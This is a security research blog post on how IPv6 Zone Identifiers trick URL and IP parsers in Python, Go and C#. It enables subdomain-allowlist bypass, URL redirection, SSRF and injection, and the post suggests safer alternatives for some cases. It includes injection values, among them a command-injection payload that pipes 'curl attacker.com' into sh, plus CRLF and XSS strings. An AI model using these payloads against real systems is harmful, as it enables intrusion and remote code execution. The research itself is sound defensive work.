Exploring IPv6 Zone Identifier

Posted on Apr 6, 2024

Introduction

This article covers a series of tricks that exploit the IPv6 Zone Identifier and the shortcomings of address parser implementations in the standard libraries of popular programming languages.

IPv6 Zone

I think many people have an idea of what IPv6 and IPv4 addresses look like:

2001:0db8:85a3:0000:0000:8a2e:0370:7334 - IPv6
192.168.0.1 - IPv4

When including an IPv6 address in a URL, it needs to be enclosed in square brackets []:

http://[::1]/path?query=value#fragment

But many people forget about the Zone Identifier (zone_id) concept in IPv6. Let’s check RFC 6874:

   In a URI, a literal IPv6 address is always embedded between "[" and
   "]".  This document specifies how a <zone_id> can be appended to the
   address.  According to URI syntax [RFC3986], "%" is always treated as
   an escape character in a URI, so, according to the established URI
   syntax [RFC3986] any occurrences of literal "%" symbols in a URI MUST
   be percent-encoded and represented in the form "%25".  Thus, the
   scoped address fe80::a%en1 would appear in a URI as
   http://[fe80::a%25en1].

Many will be surprised, but this is a valid IPv6 address:

[::1%slonser]
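As a minimal sketch of the RFC rule quoted above, the following Python snippet turns a scoped address into its URI form by writing the "%" delimiter as "%25". The helper name to_uri_host is hypothetical, and escaping the zone text itself is an extra precaution assumed here, not something the quoted passage requires.

```python
import ipaddress
from urllib.parse import quote


def to_uri_host(scoped_address):
    """Return the bracketed URI form of an IPv6 address with an optional zone."""
    # Zone identifiers are understood by IPv6Address since Python 3.9.
    addr = ipaddress.IPv6Address(scoped_address)
    # Rebuilding from the integer value yields the address without its zone.
    bare = str(ipaddress.IPv6Address(int(addr)))
    if addr.scope_id is None:
        return f"[{bare}]"
    # The "%" delimiter becomes "%25"; the zone text is escaped as well.
    return f"[{bare}%25{quote(addr.scope_id, safe='')}]"


print(to_uri_host("fe80::a%en1"))
print(to_uri_host("::1"))
```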

Whitelisted subdomains

Golang and Python

Let’s consider the URL http://[::1]/. If we try to extract the hostname in different languages, we’ll get different results:

Go (Hostname), Python - ::1
Go (Host), C#, Java, PHP - [::1]
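The Python side of this comparison can be checked with a short sketch. It uses only urllib.parse from the standard library; the URL with port 8080 is an extra illustration that is not part of the list above.

```python
from urllib.parse import urlparse

parsed = urlparse("http://[::1]/")
print(parsed.hostname)  # host with the square brackets stripped
print(parsed.netloc)    # authority as written, brackets kept

with_port = urlparse("http://[::1]:8080/")
print(with_port.hostname, with_port.port, with_port.netloc)
```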

As seen in Go and Python, the IPv6 address will be returned without the square brackets []. To understand the potential issues this might cause, let’s consider some code examples.

Python:

from urllib.parse import urlparse

def is_subdomain_of_example(url_string):
    parsed_url = urlparse(url_string)
    if parsed_url.hostname:
        print(parsed_url.hostname)
        host_parts = parsed_url.hostname.split('.')
        if len(host_parts) >= 3 and host_parts[-2:] == ['example', 'com']:
            return True
    return False

def main():
    url = "..."
    if is_subdomain_of_example(url):
        print(url, "is a subdomain of example.com")
    else:
        print(url, "is not a subdomain of example.com")

if __name__ == "__main__":
    main()

And golang:

package main

import (
	"fmt"
	"net/url"
	"strings"
)

func isSubdomainOfExample(urlString string) bool {
	parsedURL, err := url.Parse(urlString)

	if err != nil {
		fmt.Println("Error:", err)
		return false
	}

	hostParts := strings.Split(parsedURL.Hostname(), ".")
	if len(hostParts) >= 3 && hostParts[len(hostParts)-2] == "example" && hostParts[len(hostParts)-1] == "com" {
		return true
	}
	return false
}

func main() {
	urlToCheck := "..."
	if isSubdomainOfExample(urlToCheck) {
		fmt.Println(urlToCheck, "is a subdomain of example.com")
	} else {
		fmt.Println(urlToCheck, "is not a subdomain of example.com")
	}
}

The essence of these code examples is roughly the same: they check whether the host of the passed URL is a subdomain of example.com by splitting the hostname on dots, which is a common approach.

Let’s leverage our knowledge of the IPv6 Zone Identifier and use the following URL:

http://[::1%25.example.com]

In both cases, we will see output:

http://[::1%25.example.com] is a subdomain of example.com

But if we send a request to this URL, it will actually go to the address [::1].

To make this logic safer, you just need to use .netloc in Python and .Host in Go. (Both return the address in [].)
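A stricter variant is sketched below. It assumes the allowlist only ever needs to match plain DNS names, so anything with brackets or userinfo in the authority is refused before the labels are compared. This is one possible hardening, not the only correct one.

```python
from urllib.parse import urlsplit


def is_subdomain_of_example(url_string):
    """Return True only for plain DNS names that end in .example.com."""
    try:
        parts = urlsplit(url_string)
    except ValueError:
        # Some Python versions raise on malformed bracketed hosts.
        return False

    netloc = parts.netloc
    # Assumption: IP literals (anything in brackets) and userinfo
    # ("user@host") are never legitimate here, so reject them outright.
    if "[" in netloc or "]" in netloc or "@" in netloc:
        return False

    host = parts.hostname
    if not host:
        return False

    labels = host.split(".")
    # Require non-empty labels and the exact example.com suffix.
    return len(labels) >= 3 and all(labels) and labels[-2:] == ["example", "com"]


for candidate in ("http://a.example.com/", "http://[::1%25.example.com]/"):
    print(candidate, is_subdomain_of_example(candidate))
```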

C#

While I was testing this vector, I decided to look into how it’s implemented in the standard C# library. As mentioned earlier, Host in C# returns the address in [], but it turned out that besides Host, there’s also DnsSafeHost, which drops the brackets and is susceptible to the same issue.

using System;

class Program
{
    // Naive check: split the host on dots and compare the last two labels.
    static bool IsSubdomainOfExample(string urlString)
    {
        Uri uri = new Uri(urlString);

        // DnsSafeHost returns an IPv6 literal without the surrounding [].
        string[] hostParts = uri.DnsSafeHost.Split('.');
        return hostParts.Length >= 3 && hostParts[^2] == "example" && hostParts[^1] == "com";
    }

    static void Main()
    {
        string urlToCheck = "http://[::1%25.example.com]";
        if (IsSubdomainOfExample(urlToCheck))
        {
            Console.WriteLine(urlToCheck + " is a subdomain of example.com");
        }
        else
        {
            Console.WriteLine(urlToCheck + " is not a subdomain of example.com");
        }
    }
}

ip_address and Injections

ipaddress.ip_address is the most common way to parse IP addresses in Python.

>>> import ipaddress
>>> ipaddress.ip_address('::1%slonser')
IPv6Address('::1%slonser')
>>> print(ipaddress.ip_address('::1%slonser'))
::1%slonser

We’ve confirmed that the library keeps the Zone Identifier in the parsed address. It’s important to understand that many developers are not aware of this behavior, which can lead to injections.
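If the application never needs scoped addresses, one option is to refuse them at parse time. The sketch below relies on the scope_id attribute that IPv6Address has had since Python 3.9; the function name parse_ip_without_zone is hypothetical.

```python
import ipaddress


def parse_ip_without_zone(text):
    """Parse an IP address and refuse any IPv6 zone identifier."""
    addr = ipaddress.ip_address(text)  # raises ValueError on invalid input
    # IPv4Address has no scope_id attribute, hence the getattr default.
    if getattr(addr, "scope_id", None) is not None:
        raise ValueError(f"zone identifier not allowed: {text!r}")
    return addr


print(parse_ip_without_zone("::1"))
try:
    parse_ip_without_zone("::1%slonser")
except ValueError as exc:
    print("rejected:", exc)
```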

A few real-life examples:

URL formatting

Example:

addr = ipaddress.ip_address('::1%61]@example.com#')
url = f"https://[{addr}]:80/info"

In such cases, the Zone Identifier closes the brackets [] early, and the @ turns everything before it into userinfo, so the request goes to a destination different from what the developer expects. This also works with parsed_url._replace:

parsed_url._replace(netloc="[::1%61]@example.com")
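To see why the request ends up at example.com, the sketch below formats the URL from the example and then splits the authority by hand. The split is a simplified reading of RFC 3986 (authority ends at the first "/", "?" or "#"; userinfo is everything before the last "@") and is an assumption about how an HTTP client might interpret the string, not the behavior of any particular library.

```python
import ipaddress

addr = ipaddress.ip_address("::1%61]@example.com#")
url = f"https://[{addr}]:80/info"
print(url)

# Simplified authority extraction: cut at the first "/", "?" or "#".
authority = url.split("//", 1)[1]
for delimiter in "/?#":
    authority = authority.split(delimiter, 1)[0]

# Everything before the last "@" is treated as userinfo.
userinfo, _, host = authority.rpartition("@")
print("userinfo:", userinfo)
print("host:", host)
```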

RCE

In some cases (if you’re very lucky), this can lead to the possibility of executing code:

os.system(f"ping -c 1 {addr} > ./file")

We can’t use the “/” symbol because ip_address rejects it, but it’s still possible to execute code:

>>> ipaddress.ip_address('::1%;curl attacker.com | sh;')
IPv6Address('::1%;curl attacker.com | sh;')
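A more defensive way to build the same command is sketched below. It assumes that legitimate zone identifiers look like interface names or indexes (for example "eth0" or "3"), so a conservative character allowlist is applied, and it returns an argument list meant for subprocess.run without a shell. The name build_ping_argv and the allowlist are hypothetical.

```python
import ipaddress
import re

# Assumption: zones are interface names or indexes, so this set is enough.
SAFE_ZONE = re.compile(r"[A-Za-z0-9_.-]+")


def build_ping_argv(text):
    """Return an argument list for ping, or raise ValueError."""
    addr = ipaddress.ip_address(text)
    zone = getattr(addr, "scope_id", None)
    if zone is not None and not SAFE_ZONE.fullmatch(zone):
        raise ValueError(f"suspicious zone identifier: {zone!r}")
    # An argument list is handed to the program directly, with no shell in
    # between, so ";" and "|" would carry no special meaning anyway.
    return ["ping", "-c", "1", str(addr)]


print(build_ping_argv("fe80::1%eth0"))
try:
    build_ping_argv("::1%;curl attacker.com | sh;")
except ValueError as exc:
    print("rejected:", exc)
```

The returned list can then be passed to subprocess.run(argv, capture_output=True) instead of formatting a string for os.system.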

Other vectors

It’s important to understand that CRLF injection is also possible in some use cases:

>>> ipaddress.ip_address('::1%\r\nasd')
IPv6Address('::1%\r\nasd')

You can also try to get XSS with:

https://[::1%<h1>slon<h1>]

Python will parse the hostname as:

::1%<h1>slon<h1>

Also, it is important to understand that:

>>> ipaddress.ip_address('::1%a') == ipaddress.ip_address('::1%b')
False

The comparison treats these as different addresses, although it is the same address, only reached through different zones. In some cases, this allows bypassing blacklist checks.
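One way to make such a check robust is to drop the zone before comparing. The sketch below rebuilds the address from its integer value, which discards the Zone Identifier; the BLOCKED set and the function name is_blocked are hypothetical.

```python
import ipaddress

# Hypothetical blocklist of loopback addresses.
BLOCKED = {ipaddress.ip_address("::1"), ipaddress.ip_address("127.0.0.1")}


def is_blocked(text):
    """Compare against the blocklist with any zone identifier removed."""
    addr = ipaddress.ip_address(text)
    if isinstance(addr, ipaddress.IPv6Address):
        # int(addr) carries only the 128-bit value, so the zone is lost here.
        addr = ipaddress.IPv6Address(int(addr))
    return addr in BLOCKED


print(ipaddress.ip_address("::1%a") in BLOCKED)  # naive membership test
print(is_blocked("::1%a"))                       # normalized membership test
```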

In fact, this provides ample room for attacks, as developers rarely consider that an IPv6 address could contain any injection. I won’t enumerate other possibilities.

Golang, golang…

Finally, I want to delve further into how Golang parses the Zone Identifier and why it’s unique. Let’s look at the net/url source:

		zone := strings.Index(host[:i], "%25")
		if zone >= 0 {
			host1, err := unescape(host[:zone], encodeHost)
			if err != nil {
				return "", err
			}
			host2, err := unescape(host[zone:i], encodeZone)
			if err != nil {
				return "", err
			}
			host3, err := unescape(host[i:], encodeHost)
			if err != nil {
				return "", err
			}
			return host1 + host2 + host3, nil
		}

Note that Golang URL-decodes the passed Zone Identifier. Let’s take a closer look at how it works.

	urlToCheck := "http://[::1%2561%5d%3c%3e]"
	parsedURL, err := url.Parse(urlToCheck)
	if err != nil {
		fmt.Println("Error:", err)
	}
	fmt.Println(parsedURL.Hostname())
	fmt.Println(parsedURL.Host)

This will output:

::1%61]<>
[::1%61]<>]

(Yeah, we can close [] :)) You can use this for attacks based on IP parsing differences.

You might have also noticed that net/url simply searches for the first occurrence of %25 in the hostname. This behavior does not comply with the standards.

	urlToCheck := "http://[%2561]"
	parsedURL, err := url.Parse(urlToCheck)
	if err != nil {
		fmt.Println("Error:", err)
	}
	fmt.Println(parsedURL.Hostname())
	fmt.Println(parsedURL.Host)
	/*
	Output: %61
	        [%61]
	*/

It may seem to provide little benefit, but it can be exploited with another incorrect implementation in net/url.

urlToCheck := "http://[%2561.google.com]"
...
/*
Output: %61.google.com
       [%61.google.com]
*/

In rare cases, this can help you achieve SSRF. It’s enough to set up DNS so that %61.attacker.com resolves to a global address, while a.attacker.com resolves to 127.0.0.1. The attack then works if the validation step resolves one name and the actual request goes to the other.
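The two names differ only by one percent-decoding step, which a short Python sketch can make visible. The helper decodes_to_other_host is hypothetical; it simply flags host strings that change when percent-decoded, which is one possible signal that two components may disagree about the target.

```python
from urllib.parse import unquote


def decodes_to_other_host(host):
    """Return True if percent-decoding would change the host name."""
    return unquote(host) != host


for name in ("%61.attacker.com", "a.attacker.com"):
    print(name, "->", unquote(name), decodes_to_other_host(name))
```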

Conclusion

In conclusion, I would like to say that the IPv6 Zone Identifier is useful to attackers because most developers believe that an IP address has a stricter format than it actually does. This misconception opens up a significant opportunity for attacks that are underestimated by the cybersecurity community.

It’s also worth noting that the existing parsers that support IPv6 zones are implemented differently and parse addresses differently. I didn’t spend much time studying this topic; perhaps someone else can come up with many more interesting aspects related to this trick.